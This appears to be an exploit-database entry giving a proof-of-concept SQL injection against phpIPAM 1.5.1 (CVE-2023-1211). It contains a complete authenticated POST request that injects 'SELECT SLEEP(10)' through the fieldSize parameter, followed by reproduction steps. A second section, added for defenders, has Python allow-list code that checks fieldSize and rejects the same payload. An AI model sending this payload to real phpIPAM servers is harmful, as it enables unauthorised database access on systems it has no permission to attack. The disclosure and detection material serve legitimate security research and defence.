# Exploit Title: phpIPAM 1.5.1 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2023-1211
Proof Of Concept

POST /app/admin/custom-fields/edit-result.php HTTP/1.1
Host: phpipam
Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token>
Content-Type: application/x-www-form-urlencoded

csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES

**Prerequisites:**
1. Valid authenticated session (PHPSESSID cookie)
2. Valid CSRF token (obtain from `/admin/custom-fields/` page first)
3. Target table must exist (default 'devices' table used)
4. Field type must be enum/set to reach vulnerable code path

**Manual Test Steps:**
1. Log in to phpIPAM
2. Visit `/admin/custom-fields/` to get the CSRF token
3. Send the POST request with the above payload

**Note:** Replace `<valid_session_id>` and `<valid_csrf_token>` with actual values from an authenticated session. The `fieldSize` parameter is the injection point: its value is placed in the enum/set type definition context.

Steps to Reproduce
1. Log in as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensuring it includes a valid session cookie and CSRF token.
3. Observe the result.
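
For defenders, an added example (not code from phpIPAM or from the PoC author) of an allow-list check on `fieldSize` that a proxy rule or regression test could apply to bodies sent to `edit-result.php`. The grammars for valid sizes, the function names and the benign sample body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumed grammar (not from phpIPAM): an enum/set definition is a comma-separated
# list of single-quoted literals; a quote inside a literal is doubled ('').
# Backslashes are refused because MySQL treats them as escapes by default.
_LITERAL = r"'(?:[^'\\]|'')*'"
_ENUM_LIST = re.compile(rf"\s*{_LITERAL}(?:\s*,\s*{_LITERAL})*\s*")
# Assumed grammar for every other type: empty, N, or N,M (e.g. decimal 10,2).
_NUMERIC = re.compile(r"\d{1,5}(?:,\d{1,2})?")


def field_size_is_safe(field_type, field_size):
    """True if field_size can only be read as a type length or value list."""
    if field_type.lower() in ("enum", "set"):
        return _ENUM_LIST.fullmatch(field_size) is not None
    return field_size == "" or _NUMERIC.fullmatch(field_size) is not None


def check_body(body):
    """Validate a urlencoded edit-result.php body; returns (ok, reason)."""
    params = parse_qs(body, keep_blank_values=True)
    for key in ("fieldType", "fieldSize"):
        # Refuse missing or repeated keys so this check and the application
        # cannot disagree about which value is used.
        if len(params.get(key, [])) != 1:
            return False, f"{key} must appear exactly once"
    field_type, field_size = params["fieldType"][0], params["fieldSize"][0]
    if not field_size_is_safe(field_type, field_size):
        return False, f"fieldSize {field_size!r} is not valid for {field_type}"
    return True, "ok"


# Constructed sample bodies; POC reuses the fieldSize value from the request above.
POC = ("action=add&name=custom_sqli_test&fieldType=enum"
       "&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices")
BENIGN = ("action=add&name=colour&fieldType=enum"
          "&fieldSize=%27red%27%2C%27green%27&table=devices")

if __name__ == "__main__":
    for sample in (POC, BENIGN):
        print(check_body(sample))
```

The same check belongs server-side before the value reaches any statement that defines the column type; filtering at a proxy alone leaves the code path reachable by other routes.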